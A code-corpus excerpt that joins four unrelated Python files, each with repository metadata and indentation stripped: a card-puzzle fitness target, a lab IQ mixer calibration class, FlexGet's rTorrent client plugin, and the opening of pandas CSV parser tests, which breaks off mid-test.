self.canRemove = False
self.initializationType = "sequential"
self.encodingTable = None
self.group1 = []
self.group2 = []
def build_from_genome(self,genome):
assert genome != None, "Null genome passed to target!"
self.group1 = genome[0][1:]
self.group2 = genome[1][1:]
#self.params = [delta,minArea,maxArea,maxVariation,minDiversity,maxEvolution,areaThreshold,minMargin,edgeBlurSize]
def evaluate(self):
genes = []
m = 1
s = 0
for arg in self.group1:
s+=arg
genes.append(arg)
for arg in self.group2:
m*=arg
genes.append(arg)
duplicateCount = len(genes) - len(set(genes))
m-=360
s-=36
fitness = -(abs(m) + abs(s)) - duplicateCount
#print("\nFITNESS:",fitness,"\n")
return fitness
def validate_genome(self,genome):
return True
|
AechPro/Machine-Learning
|
Partners Healthcare/2016 Breast Cancer/dev/ReconNet/optimization/targets/Card_Problem_Target.py
|
Python
|
apache-2.0
| 1,157
| 0.012965
|
from math import ceil
import numpy as np
from ipywidgets import widgets
from tqdm.notebook import tqdm
from matplotlib import pyplot as plt
import lib.iq_mixer_calibration
from drivers import IQAWG
from lib.data_management import load_IQMX_calibration_database, \
save_IQMX_calibration
from lib.iq_mixer_calibration import IQCalibrator
class IQVectorGenerator:
def __init__(self, name, lo, iq_awg: IQAWG, sa, calibration_db_name="IQVG",
default_calibration_power=-30, marker_period_divisor=None,
slave_iqvgs=None, calibration_step=10e6):
"""
Parameters
----------
lo
iq_awg
sa
calibration_db_name
default_calibration_power
marker_period_divisor: int, ns
by default, the marker period should be divisible by the if_period
however, in some cases other divisor may be required, i.e. when
m3202 is used with PXICLK10 trigger sync mode this divisor
should be set to 100
"""
self._name = name
self._lo = lo
self._iqawg = iq_awg
self._sa = sa
self._cal_db_name = calibration_db_name
self._default_calibration_power = default_calibration_power
self._calibration_widget = widgets.HTML()
self._recalibrate_mixer = False
self._frequency = 5e9
self.set_if_frequency(100e6)
if marker_period_divisor is not None:
self._marker_period_divisor = marker_period_divisor
else:
self._marker_period_divisor = self._if_period
# for marker period synchronization when iqvgs are on the same AWG
self._slave_iqvgs = slave_iqvgs if slave_iqvgs is not None else []
self._power = default_calibration_power
self._dac_overridden = False
self._current_cal = None
self._requested_cal: lib.iq_mixer_calibration.IQCalibrationData = None
self._cal_db = None
self._marker_period = None
self._requested_marker_period = None
self.set_marker_period(1000)
self._calibration_initial_guess = {"dc_offsets": np.random.uniform(.03, 0.1, size=2),
"if_amplitudes": (.1, .1),
"if_phase": -np.pi * 0.54}
self._calibration_step = calibration_step
self._calibration_test_data = []
self._load_cal_db()
def get_calibration_widget(self):
return self._calibration_widget
def set_parameters(self, parameters_dict):
if "power" in parameters_dict:
self.set_power(parameters_dict["power"])
if "freq" in parameters_dict:
self.set_frequency(parameters_dict["freq"])
if "dac_overridden" in parameters_dict:
self._dac_overridden = parameters_dict["dac_overridden"]
else:
self._dac_overridden = False
def get_iqawg(self):
self._iqawg.set_parameters(
{'calibration': self._current_cal}) # ensure
return self._iqawg
def set_if_frequency(self, if_frequency):
self._if_frequency = if_frequency
self._if_period = 1 / if_frequency * 1e9 # ns
def get_if_frequency(self):
return self._if_frequency
def set_output_state(self, state):
self._lo.set_output_state(state)
def set_frequency(self, freq):
self._frequency = freq
self._lo.set_frequency(self._frequency + self._if_frequency)
self._requested_cal = self.get_calibration(self._frequency,
self._power)
self._output_SSB()
def set_power(self, power):
if power > self._default_calibration_power + 10:
raise ValueError("Power can be % dBm max, requested %d dBm" % (
self._default_calibration_power + 10, power))
self._power = power
self._requested_cal = self.get_calibration(self._frequency,
self._power)
self._lo.set_power(self._requested_cal.get_lo_power())
self._output_SSB()
def get_power(self):
return self._power
def set_marker_period(self, marker_period):
'''
For some applications there is need to control the length of the interval between triggers
output by the AWG of the IQVectorGenerator.
Parameters
----------
marker_period: ns, float
real trigger period will be recalculated to be not shorter than <marker_period> ns,
but still divisible by the IF period
'''
self._requested_marker_period = marker_period
correct_marker_period = ceil(
marker_period / self._marker_period_divisor) * \
self._marker_period_divisor
if correct_marker_period != self._marker_period:
self._marker_period = correct_marker_period
if self._requested_cal is not None:
self._current_cal = None
self._output_SSB()
for slave_iqvg in self._slave_iqvgs:
slave_iqvg.set_marker_period(self._marker_period)
def _output_SSB(self):
if self._requested_cal != self._current_cal:
# print(f"IQVG {self._name}: outputting pulse sequence to update calibration for frequency: {self._frequency/1e9:.4f} GHz"
# f", power: {self._power} dBm.")
self._iqawg.set_parameters({"calibration": self._requested_cal})
pb = self._iqawg.get_pulse_builder()
if_freq = self._requested_cal.get_radiation_parameters()[
"if_frequency"]
resolution = self._requested_cal.get_radiation_parameters()[
"waveform_resolution"]
if_period = 1 / if_freq * 1e9
if (if_period * 1e9) % resolution != 0:
print(
f"IQVectorGenerator {self._name} warning: IF period is not divisible by "
"calibration waveform resolution. Phase coherence will be bad.")
seq = pb.add_sine_pulse(self._marker_period).build()
self._iqawg.output_pulse_sequence(seq)
self._current_cal = self._requested_cal
# time.sleep(1)
def _load_cal_db(self):
self._cal_db = load_IQMX_calibration_database(self._cal_db_name, 0)
def _around_frequency(self, frequency):
# return ceil(frequency/self._calibration_step)*self._calibration_step
return round(frequency / self._calibration_step) * self._calibration_step
def get_calibration(self, frequency, power):
frequency = self._around_frequency(frequency)
# frequency = round(frequency/self._calibration_step)*self._calibration_step
if self._cal_db is None:
self._load_cal_db()
cal = \
self._cal_db.get(frozenset(dict(lo_power=14,
ssb_power=self._default_calibration_power,
lo_frequency=self._if_frequency + frequency,
if_frequency=self._if_frequency,
waveform_resolution=1,
sideband_to_maintain='left').items()))
if (cal is None) or self._recalibrate_mixer:
calibrator = IQCalibrator(self._iqawg, self._sa, self._lo,
self._cal_db_name, 0,
sidebands_to_suppress=6,
output_widget=self._calibration_widget)
ig = self._calibration_initial_guess
cal = calibrator.calibrate(
lo_frequency=frequency + self._if_frequency,
if_frequency=self._if_frequency,
lo_power=14,
ssb_power=self._default_calibration_power,
waveform_resolution=1,
iterations=3,
minimize_iterlimit=100,
sa_res_bandwidth=300,
initial_guess=ig)
save_IQMX_calibration(cal)
self._load_cal_db() # make sure to include new calibration into cache
cal._ssb_power = power
cal._if_amplitudes = cal._if_amplitudes / np.sqrt(
10 ** ((self._default_calibration_power - power) / 10))
# self._calibration_initial_guess["if_amplitudes"] = cal._if_amplitudes
self._calibration_initial_guess["if_phase"] = cal._if_phase
return cal
else:
cal = cal.copy()
cal._if_amplitudes = cal._if_amplitudes / np.sqrt(
10 ** ((self._default_calibration_power - power) / 10))
return cal
def calibrate_mixer(self, fstart, fstop, recalibrate=False):
"""
Performs calibration of the mixer in a frequency range
Parameters
----------
fstart: float
start of the frequency range
fstop : float
stop of the frequency range
recalibrate : bool
Whether or not to calibrate from scratch and override previous
calibration in this interval.
"""
fstart = self._around_frequency(fstart)
fstop = self._around_frequency(fstop)
self._recalibrate_mixer = recalibrate
pb = tqdm(np.arange(fstart, fstop + self._calibration_step, self._calibration_step),
smoothing=0)
for frequency in pb:
pb.set_description("%.3f GHz" % (frequency / 1e9))
for counter in range(3):
try:
self.set_frequency(frequency)
break
except ValueError:
print("Poor calibration at %.3f GHz, retry count "
"%d" % (frequency / 1e9, counter))
self._calibration_initial_guess["dc_offest"] = \
np.random.uniform(.03, 0.1, size=2)
self._recalibrate_mixer = False
def test_calibration(self, fstart, fstop, step=1e6,
sidebands_to_plot=[-1, 0, 1],
remeasure=False):
"""
Tests the saved calibrations by monitoring all the sidebands throughout
the specified frequency range
Parameters
----------
fstart: float, Hz
start of the frequency range
fstop: float, Hz
stop of the frequency range
step: float, Hz
step of the scan
remeasure : bool
remeasure or just replot the data from the previous run
"""
sideband_shifts = np.linspace(-3, 3, 7) * self._if_frequency
freqs = np.arange(fstart, fstop + step, step)
if remeasure or len(self._calibration_test_data) == 0:
self._calibration_test_data = []
for frequency in tqdm(freqs, smoothing=0):
self.set_frequency(frequency)
sa_freqs = sideband_shifts + self._frequency
self._sa.setup_list_sweep(list(sa_freqs), [1000] * 3)
self._sa.prepare_for_stb()
self._sa.sweep_single()
self._sa.wait_for_stb()
self._calibration_test_data.append(self._sa.get_tracedata())
self._calibration_test_data = np.array(
self._calibration_test_data).T
sidebands_to_plot_idcs = np.array(sidebands_to_plot, dtype=int) + 3
sideband_shifts = sideband_shifts[sidebands_to_plot_idcs]
data = self._calibration_test_data[sidebands_to_plot_idcs]
for row, sideband_shift in zip(data, sideband_shifts):
plt.plot(freqs, row, label=f"{(sideband_shift / 1e6):.2f} MHz")
plt.legend()
self._sa.setup_swept_sa(-self._if_frequency + self._frequency,
10 * self._if_frequency,
nop=1001, rbw=1e4)
self._sa.set_continuous()
|
vdrhtc/Measurement-automation
|
drivers/IQVectorGenerator.py
|
Python
|
gpl-3.0
| 12,060
| 0.001244
|
from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
from future.moves.xmlrpc import client as xmlrpc_client
from future.moves.urllib.parse import urlparse, urljoin
from future.utils import native_str
import logging
import os
import socket
import re
from time import sleep
from flexget.utils.template import RenderError
from flexget.utils.pathscrub import pathscrub
from flexget import plugin
from flexget.event import event
from flexget.entry import Entry
from flexget.config_schema import one_or_more
from flexget.utils.bittorrent import Torrent, is_torrent_file
from requests.auth import HTTPDigestAuth, HTTPBasicAuth
log = logging.getLogger('rtorrent')
class _Method(object):
# some magic to bind an XML-RPC method to an RPC server.
# supports "nested" methods (e.g. examples.getStateName)
def __init__(self, send, name):
self.__send = send
self.__name = name
def __getattr__(self, name):
return _Method(self.__send, "%s.%s" % (self.__name, name))
def __call__(self, *args):
return self.__send(self.__name, args)
class HTTPDigestTransport(xmlrpc_client.Transport):
"""
Transport that uses requests to support Digest authentication.
"""
def __init__(self, scheme, digest_auth, username, password, session, *args, **kwargs):
self.__scheme = scheme
self.__session = session
self.__digest_auth = digest_auth
self.__username = username
self.__password = password
self.verbose = 0
xmlrpc_client.Transport.__init__(self, *args, **kwargs) # old style class
def request(self, host, handler, request_body, verbose=False):
return self.single_request(host, handler, request_body, verbose)
def single_request(self, host, handler, request_body, verbose=0):
url = urljoin('{0}://{1}'.format(self.__scheme, host), handler)
auth = self.get_auth()
response = self.send_request(url, auth, request_body)
# if status code is 401, it means we used the wrong auth method
if response.status_code == 401:
log.warning('%s auth failed. Retrying with %s. Please change your config.',
'Digest' if self.__digest_auth else 'Basic',
'Basic' if self.__digest_auth else 'Digest')
self.__digest_auth = not self.__digest_auth
auth = self.get_auth()
response = self.send_request(url, auth, request_body)
response.raise_for_status()
return self.parse_response(response)
def get_auth(self):
if self.__digest_auth:
return HTTPDigestAuth(self.__username, self.__password)
return HTTPBasicAuth(self.__username, self.__password)
def send_request(self, url, auth, data):
return self.__session.post(url, auth=auth, data=data, raise_status=False)
def parse_response(self, response):
p, u = self.getparser()
if self.verbose:
log.info('body: %s', repr(response))
p.feed(response.content)
p.close()
return u.close()
class SCGITransport(xmlrpc_client.Transport):
""" Used to override the default xmlrpclib transport to support SCGI """
def __init__(self, *args, **kwargs):
self.verbose = 0
xmlrpc_client.Transport.__init__(self, *args, **kwargs)
def request(self, host, handler, request_body, verbose=False):
return self.single_request(host, handler, request_body, verbose)
def single_request(self, host, handler, request_body, verbose=0):
# Add SCGI headers to the request.
headers = [('CONTENT_LENGTH', native_str(len(request_body))), ('SCGI', '1')]
header = '\x00'.join(['%s\x00%s' % (key, value) for key, value in headers]) + '\x00'
header = '%d:%s' % (len(header), header)
request_body = '%s,%s' % (header, request_body)
sock = None
try:
if host:
parsed_host = urlparse(host)
host = parsed_host.hostname
port = parsed_host.port
addr_info = socket.getaddrinfo(host, port, socket.AF_INET, socket.SOCK_STREAM)
sock = socket.socket(*addr_info[0][:3])
sock.connect(addr_info[0][4])
else:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(handler)
self.verbose = verbose
sock.sendall(request_body.encode())
return self.parse_response(sock.makefile())
finally:
if sock:
sock.close()
def parse_response(self, response):
p, u = self.getparser()
response_body = ''
while True:
data = response.read(1024)
if not data:
break
response_body += data
if self.verbose:
log.info('body: %s', repr(response_body))
# Remove SCGI headers from the response.
_, response_body = re.split(r'\n\s*?\n', response_body, maxsplit=1)
p.feed(response_body)
p.close()
return u.close()
class SCGIServerProxy(object):
""" Enable connection to SCGI proxy """
def __init__(self, uri, transport=None, encoding=None,
verbose=False, allow_none=False, use_datetime=False):
parsed_url = urlparse(uri)
self.__host = uri if parsed_url.scheme else None
self.__handler = parsed_url.path
if not self.__handler:
self.__handler = '/'
if not transport:
transport = SCGITransport(use_datetime=use_datetime)
self.__transport = transport
self.__encoding = encoding or 'utf-8'
self.__verbose = verbose
self.__allow_none = allow_none
def __close(self):
self.__transport.close()
def __request(self, method_name, params):
# call a method on the remote server
request = xmlrpc_client.dumps(params, method_name, encoding=self.__encoding,
allow_none=self.__allow_none).encode(self.__encoding)
response = self.__transport.request(
self.__host,
self.__handler,
request.decode('utf-8'),
verbose=self.__verbose
)
if len(response) == 1:
response = response[0]
return response
def __repr__(self):
return (
"<ServerProxy for %s%s>" %
(self.__host, self.__handler)
)
__str__ = __repr__
def __getattr__(self, name):
# magic method dispatcher
return _Method(self.__request, name)
# note: to call a remote object with an non-standard name, use
# result getattr(server, "strange-python-name")(args)
def __call__(self, attr):
"""A workaround to get special attributes on the ServerProxy
without interfering with the magic __getattr__
"""
if attr == "close":
return self.__close
elif attr == "transport":
return self.__transport
raise AttributeError("Attribute %r not found" % (attr,))
class RTorrent(object):
""" rTorrent API client """
default_fields = (
'hash',
'name',
'up_total', 'down_total', 'down_rate',
'is_open', 'is_active',
'custom1', 'custom2', 'custom3', 'custom4', 'custom5',
'state', 'complete',
'bytes_done', 'down.rate', 'left_bytes',
'ratio',
'base_path', 'load_date'
)
required_fields = (
'hash',
'name',
'base_path'
)
def __init__(self, uri, username=None, password=None, digest_auth=None, session=None):
"""
New connection to rTorrent
:param uri: RTorrent URL. Supports both http(s) and scgi
:param username: Username for basic auth over http(s)
:param password: Password for basic auth over http(s)
"""
self.uri = uri
self.username = username
self.password = password
self.digest_auth = digest_auth
self._version = None
parsed_uri = urlparse(uri)
if self.username and self.password and parsed_uri.scheme not in ['http', 'https']:
raise IOError('Username and password only supported on http(s)')
# Determine the proxy server
if parsed_uri.scheme in ['http', 'https']:
sp = xmlrpc_client.ServerProxy
elif parsed_uri.scheme == 'scgi':
sp = SCGIServerProxy
elif parsed_uri.scheme == '' and parsed_uri.path:
self.uri = parsed_uri.path
sp = SCGIServerProxy
else:
raise IOError('Unsupported scheme %s for uri %s' % (parsed_uri.scheme, self.uri))
# Use a special transport if http(s)
if parsed_uri.scheme in ['http', 'https']:
self._server = sp(self.uri, transport=HTTPDigestTransport(parsed_uri.scheme, self.digest_auth,
self.username, self.password, session))
else:
self._server = sp(self.uri)
def _clean_fields(self, fields, reverse=False):
if not fields:
fields = list(self.default_fields)
if reverse:
for field in ['up.total', 'down.total', 'down.rate']:
if field in fields:
fields[fields.index(field)] = native_str(field.replace('.', '_'))
return fields
for required_field in self.required_fields:
if required_field not in fields:
fields.insert(0, required_field)
for field in ['up_total', 'down_total', 'down_rate']:
if field in fields:
fields[fields.index(field)] = native_str(field.replace('_', '.'))
return fields
@property
def version(self):
return [int(v) for v in self._server.system.client_version().split('.')]
def load(self, raw_torrent, fields=None, start=False, mkdir=True):
if fields is None:
fields = {}
# First param is empty 'target'
params = ['', xmlrpc_client.Binary(raw_torrent)]
# Additional fields to set
for key, val in fields.items():
# Values must be escaped if within params
params.append('d.%s.set=%s' % (key, re.escape(native_str(val))))
if mkdir and 'directory' in fields:
result = self._server.execute.throw('', 'mkdir', '-p', fields['directory'])
if result != 0:
raise xmlrpc_client.Error('Failed creating directory %s' % fields['directory'])
# by default rtorrent won't allow calls over 512kb in size.
xmlrpc_size = len(xmlrpc_client.dumps(tuple(params), 'raw_start')) + 71680 # Add 70kb for buffer
if xmlrpc_size > 524288:
prev_size = self._server.network.xmlrpc.size_limit()
self._server.network.xmlrpc.size_limit.set('', xmlrpc_size)
# Call load method and return the response
if start:
result = self._server.load.raw_start(*params)
else:
result = self._server.load.raw(*params)
if xmlrpc_size > 524288:
self._server.network.xmlrpc.size_limit.set('', prev_size)
return result
def torrent(self, info_hash, fields=None):
""" Get the details of a torrent """
info_hash = native_str(info_hash)
if not fields:
fields = list(self.default_fields)
fields = self._clean_fields(fields)
multi_call = xmlrpc_client.MultiCall(self._server)
for field in fields:
method_name = 'd.%s' % field
getattr(multi_call, method_name)(info_hash)
resp = multi_call()
# TODO: Maybe we should return a named tuple or a Torrent class?
return dict(list(zip(self._clean_fields(fields, reverse=True), [val for val in resp])))
def torrents(self, view='main', fields=None):
if not fields:
fields = list(self.default_fields)
fields = self._clean_fields(fields)
params = ['d.%s=' % field for field in fields]
params.insert(0, view)
resp = self._server.d.multicall(params)
# Response is formatted as a list of lists, with just the values
return [dict(list(zip(self._clean_fields(fields, reverse=True), val))) for val in resp]
def update(self, info_hash, fields):
multi_call = xmlrpc_client.MultiCall(self._server)
for key, val in fields.items():
method_name = 'd.%s.set' % key
getattr(multi_call, method_name)(native_str(info_hash), native_str(val))
return multi_call()[0]
def delete(self, info_hash):
return self._server.d.erase(native_str(info_hash))
def stop(self, info_hash):
self._server.d.stop(info_hash)
return self._server.d.close(native_str(info_hash))
def start(self, info_hash):
return self._server.d.start(native_str(info_hash))
def move(self, info_hash, dst_path):
info_hash = native_str(info_hash)
self.stop(info_hash)
torrent = self.torrent(info_hash, fields=['base_path'])
try:
log.verbose('Creating destination directory `%s`' % dst_path)
self._server.execute.throw('', 'mkdir', '-p', dst_path)
except xmlrpc_client.Error:
raise xmlrpc_client.Error("unable to create folder %s" % dst_path)
self._server.execute.throw('', 'mv', '-u', torrent['base_path'], dst_path)
self._server.d.set_directory(info_hash, dst_path)
self.start(info_hash)
class RTorrentPluginBase(object):
priority_map = {
'high': 3,
'medium': 2,
'low': 1,
'off': 0,
}
def _build_options(self, config, entry, entry_first=True):
options = {}
for opt_key in ('path', 'message', 'priority',
'custom1', 'custom2', 'custom3', 'custom4', 'custom5'):
# Values do not merge config with task
# Task takes priority then config is used
entry_value = entry.get(opt_key)
config_value = config.get(opt_key)
if entry_first:
if entry_value:
options[opt_key] = entry.render(entry_value)
elif config_value:
options[opt_key] = entry.render(config_value)
else:
if config_value:
options[opt_key] = entry.render(config_value)
elif entry_value:
options[opt_key] = entry.render(entry_value)
# Convert priority from string to int
priority = options.get('priority')
if priority and priority in self.priority_map:
options['priority'] = self.priority_map[priority]
# Map Flexget path to directory in rTorrent
if options.get('path'):
options['directory'] = options['path']
del options['path']
if 'directory' in options:
options['directory'] = pathscrub(options['directory'])
return options
def on_task_start(self, task, config):
try:
client = RTorrent(os.path.expanduser(config['uri']),
username=config.get('username'),
password=config.get('password'),
digest_auth=config['digest_auth'],
session=task.requests)
if client.version < [0, 9, 2]:
log.error('rtorrent version >=0.9.2 required, found {0}'.format('.'.join(map(str, client.version))))
task.abort('rtorrent version >=0.9.2 required, found {0}'.format('.'.join(map(str, client.version))))
except (IOError, xmlrpc_client.Error) as e:
raise plugin.PluginError("Couldn't connect to rTorrent: %s" % str(e))
class RTorrentOutputPlugin(RTorrentPluginBase):
schema = {
'type': 'object',
'properties': {
# connection info
'uri': {'type': 'string'},
'username': {'type': 'string'},
'password': {'type': 'string'},
'digest_auth': {'type': 'boolean', 'default': False},
'start': {'type': 'boolean', 'default': True},
'mkdir': {'type': 'boolean', 'default': True},
'action': {'type': 'string', 'emun': ['update', 'delete', 'add'], 'default': 'add'},
# properties to set on rtorrent download object
'message': {'type': 'string'},
'priority': {'type': 'string'},
'path': {'type': 'string'},
'custom1': {'type': 'string'},
'custom2': {'type': 'string'},
'custom3': {'type': 'string'},
'custom4': {'type': 'string'},
'custom5': {'type': 'string'},
},
'required': ['uri'],
'additionalProperties': False,
}
def _verify_load(self, client, info_hash):
ex = IOError()
for _ in range(0, 5):
try:
return client.torrent(info_hash, fields=['hash'])
except (IOError, xmlrpc_client.Error) as e:
ex = e
sleep(0.5)
raise ex
@plugin.priority(120)
def on_task_download(self, task, config):
# If the download plugin is not enabled, we need to call it to get
# our temp .torrent files
if config['action'] == 'add' and 'download' not in task.config:
download = plugin.get_plugin_by_name('download')
download.instance.get_temp_files(task, handle_magnets=True, fail_html=True)
@plugin.priority(135)
def on_task_output(self, task, config):
client = RTorrent(os.path.expanduser(config['uri']),
username=config.get('username'),
password=config.get('password'),
digest_auth=config['digest_auth'],
session=task.requests)
for entry in task.accepted:
if config['action'] == 'add':
if task.options.test:
log.info('Would add %s to rTorrent', entry['url'])
continue
try:
options = self._build_options(config, entry)
except RenderError as e:
entry.fail("failed to render properties %s" % str(e))
continue
self.add_entry(client, entry, options, start=config['start'], mkdir=config['mkdir'])
info_hash = entry.get('torrent_info_hash')
if not info_hash:
entry.fail('Failed to %s as no info_hash found' % config['action'])
continue
if config['action'] == 'delete':
if task.options.test:
log.info('Would delete %s (%s) from rTorrent', entry['title'], entry['torrent_info_hash'])
continue
self.delete_entry(client, entry)
if config['action'] == 'update':
if task.options.test:
log.info('Would update %s (%s) in rTorrent', entry['title'], entry['torrent_info_hash'])
continue
self.update_entry(client, entry, config)
def delete_entry(self, client, entry):
try:
client.delete(entry['torrent_info_hash'])
log.verbose('Deleted %s (%s) in rtorrent ' % (entry['title'], entry['torrent_info_hash']))
except (IOError, xmlrpc_client.Error) as e:
entry.fail('Failed to delete: %s' % str(e))
return
def update_entry(self, client, entry, config):
info_hash = entry['torrent_info_hash']
# First check if it already exists
try:
existing = client.torrent(info_hash, fields=['base_path'])
except IOError as e:
entry.fail("Error updating torrent %s" % str(e))
return
except xmlrpc_client.Error as e:
existing = False
# Build options but make config values override entry values
try:
options = self._build_options(config, entry, entry_first=False)
except RenderError as e:
entry.fail("failed to render properties %s" % str(e))
return
if existing and 'directory' in options:
# Check if changing to another directory which requires a move
if options['directory'] != existing['base_path'] \
and options['directory'] != os.path.dirname(existing['base_path']):
try:
log.verbose("Path is changing, moving files from '%s' to '%s'"
% (existing['base_path'], options['directory']))
client.move(info_hash, options['directory'])
except (IOError, xmlrpc_client.Error) as e:
entry.fail('Failed moving torrent: %s' % str(e))
return
# Remove directory from update otherwise rTorrent will append the title to the directory path
if 'directory' in options:
del options['directory']
try:
client.update(info_hash, options)
log.verbose('Updated %s (%s) in rtorrent ' % (entry['title'], info_hash))
except (IOError, xmlrpc_client.Error) as e:
entry.fail('Failed to update: %s' % str(e))
return
def add_entry(self, client, entry, options, start=True, mkdir=False):
if 'torrent_info_hash' not in entry:
entry.fail('missing torrent_info_hash')
return
if entry['url'].startswith('magnet:'):
torrent_raw = 'd10:magnet-uri%d:%se' % (len(entry['url']), entry['url'])
torrent_raw = torrent_raw.encode('ascii')
else:
# Check that file is downloaded
if 'file' not in entry:
raise plugin.PluginError('Temporary download file is missing from entry')
# Verify the temp file exists
if not os.path.exists(entry['file']):
raise plugin.PluginError('Temporary download file is missing from disk')
# Verify valid torrent file
if not is_torrent_file(entry['file']):
entry.fail("Downloaded temp file '%s' is not a torrent file" % entry['file'])
return
try:
with open(entry['file'], 'rb') as f:
torrent_raw = f.read()
except IOError as e:
entry.fail('Failed to add to rTorrent %s' % str(e))
return
try:
Torrent(torrent_raw)
except SyntaxError as e:
entry.fail('Strange, unable to decode torrent, raise a BUG: %s' % str(e))
return
# First check if it already exists
try:
if client.torrent(entry['torrent_info_hash']):
log.warning("Torrent %s already exists, won't add" % entry['title'])
return
except IOError as e:
entry.fail("Error checking if torrent already exists %s" % str(e))
except xmlrpc_client.Error:
# No existing found
pass
try:
resp = client.load(torrent_raw, fields=options, start=start, mkdir=mkdir)
if resp != 0:
entry.fail('Failed to add to rTorrent invalid return value %s' % resp)
except (IOError, xmlrpc_client.Error) as e:
log.exception(e)
entry.fail('Failed to add to rTorrent %s' % str(e))
return
# Verify the torrent loaded
try:
self._verify_load(client, entry['torrent_info_hash'])
log.info('%s added to rtorrent' % entry['title'])
except (IOError, xmlrpc_client.Error) as e:
entry.fail('Failed to verify torrent loaded: %s' % str(e))
def on_task_learn(self, task, config):
""" Make sure all temp files are cleaned up when entries are learned """
# If download plugin is enabled, it will handle cleanup.
if 'download' not in task.config:
download = plugin.get_plugin_by_name('download')
download.instance.cleanup_temp_files(task)
on_task_abort = on_task_learn
class RTorrentInputPlugin(RTorrentPluginBase):
schema = {
'type': 'object',
'properties': {
'uri': {'type': 'string'},
'username': {'type': 'string'},
'password': {'type': 'string'},
'digest_auth': {'type': 'boolean', 'default': False},
'view': {'type': 'string', 'default': 'main'},
'fields': one_or_more({'type': 'string', 'enum': list(RTorrent.default_fields)}),
},
'required': ['uri'],
'additionalProperties': False
}
def on_task_input(self, task, config):
client = RTorrent(os.path.expanduser(config['uri']),
username=config.get('username'),
password=config.get('password'),
digest_auth=config['digest_auth'],
session=task.requests)
fields = config.get('fields')
try:
torrents = client.torrents(config['view'], fields=fields)
except (IOError, xmlrpc_client.Error) as e:
task.abort('Could not get torrents (%s): %s' % (config['view'], e))
return
entries = []
for torrent in torrents:
entry = Entry(
title=torrent['name'],
url='%s/%s' % (os.path.expanduser(config['uri']),
torrent['hash']),
path=torrent['base_path'],
torrent_info_hash=torrent['hash'],
)
for attr, value in torrent.items():
entry[attr] = value
entries.append(entry)
return entries
@event('plugin.register')
def register_plugin():
plugin.register(RTorrentOutputPlugin, 'rtorrent', api_ver=2)
plugin.register(RTorrentInputPlugin, 'from_rtorrent', api_ver=2)
|
qk4l/Flexget
|
flexget/plugins/clients/rtorrent.py
|
Python
|
mit
| 26,286
| 0.001902
|
"""
Tests that apply specifically to the Python parser. Unless specifically
stated as a Python-specific issue, the goal is to eventually move as many of
these tests out of this module as soon as the C parser can accept further
arguments when parsing.
"""
import csv
from io import (
BytesIO,
StringIO,
)
import pytest
from pandas.errors import ParserError
from pandas import (
DataFrame,
Index,
MultiIndex,
)
import pandas._testing as tm
def test_default_separator(python_parser_only):
# see gh-17333
#
# csv.Sniffer in Python treats "o" as separator.
data = "aob\n1o2\n3o4"
parser = python_parser_only
expected = DataFrame({"a": [1, 3], "b": [2, 4]})
result = parser.read_csv(StringIO(data), sep=None)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("skipfooter", ["foo", 1.5, True])
def test_invalid_skipfooter_non_int(python_parser_only, skipfooter):
# see gh-15925 (comment)
data = "a\n1\n2"
parser = python_parser_only
msg = "skipfooter must be an integer"
with pytest.raises(ValueError, match=msg):
parser.read_csv(StringIO(data), skipfooter=skipfooter)
def test_invalid_skipfooter_negative(python_parser_only):
# see gh-15925 (comment)
data = "a\n1\n2"
parser = python_parser_only
msg = "skipfooter cannot be negative"
with pytest.raises(ValueError, match=msg):
parser.read_csv(StringIO(data), skipfooter=-1)
@pytest.mark.parametrize("kwargs", [{"sep": None}, {"delimiter": "|"}])
def test_sniff_delimiter(python_parser_only, kwargs):
data = """index|A|B|C
foo|1|2|3
bar|4|5|6
baz|7|8|9
"""
parser = python_parser_only
result = parser.read_csv(StringIO(data), index_col=0, **kwargs)
expected = DataFrame(
[[1, 2, 3], [4, 5, 6], [7, 8, 9]],
columns=["A", "B", "C"],
index=Index(["foo", "bar", "baz"], name="index"),
)
tm.assert_frame_equal(result, expected)
def test_sniff_delimiter_comment(python_parser_only):
data = """# comment line
index|A|B|C
# comment line
foo|1|2|3 # ignore | this
bar|4|5|6
baz|7|8|9
"""
parser = python_parser_only
result = parser.read_csv(StringIO(data), index_col=0, sep=None, comment="#")
expected = DataFrame(
[[1, 2, 3], [4, 5, 6], [7, 8, 9]],
columns=["A", "B", "C"],
index=Index(["foo", "bar", "baz"], name="index"),
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("encoding", [None, "utf-8"])
def test_sniff_delimiter_encoding(python_parser_only, encoding):
parser = python_parser_only
data = """ignore this
ignore this too
index|A|B|C
foo|1|2|3
bar|4|5|6
baz|7|8|9
"""
if encoding is not None:
from io import TextIOWrapper
data = data.encode(encoding)
data = BytesIO(data)
data = TextIOWrapper(data, encoding=encoding)
else:
data = StringIO(data)
result = parser.read_csv(data, index_col=0, sep=None, skiprows=2, encoding=encoding)
expected = DataFrame(
[[1, 2, 3], [4, 5, 6], [7, 8, 9]],
columns=["A", "B", "C"],
index=Index(["foo", "bar", "baz"], name="index"),
)
tm.assert_frame_equal(result, expected)
def test_single_line(python_parser_only):
# see gh-6607: sniff separator
parser = python_parser_only
result = parser.read_csv(StringIO("1,2"), names=["a", "b"], header=None, sep=None)
expected = DataFrame({"a": [1], "b": [2]})
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [{"skipfooter": 2}, {"nrows": 3}])
def test_skipfooter(python_parser_only, kwargs):
# see gh-6607
data = """A,B,C
1,2,3
4,5,6
7,8,9
want to skip this
also also skip this
"""
parser = python_parser_only
result = parser.read_csv(StringIO(data), **kwargs)
expected = DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]], columns=["A", "B", "C"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"compression,klass", [("gzip", "GzipFile"), ("bz2", "BZ2File")]
)
def test_decompression_regex_sep(python_parser_only, csv1, compression, klass):
# see gh-6607
parser = python_parser_only
with open(csv1, "rb") as f:
data = f.read()
data = data.replace(b",", b"::")
expected = parser.read_csv(csv1)
module = pytest.importorskip(compression)
klass = getattr(module, klass)
with tm.ensure_clean() as path:
tmp = klass(path, mode="wb")
tmp.write(data)
tmp.close()
result = parser.read_csv(path, sep="::", compression=compression)
tm.assert_frame_equal(result, expected)
def test_read_csv_buglet_4x_multi_index(python_parser_only):
# see gh-6607
data = """ A B C D E
one two three four
a b 10.0032 5 -0.5109 -2.3358 -0.4645 0.05076 0.3640
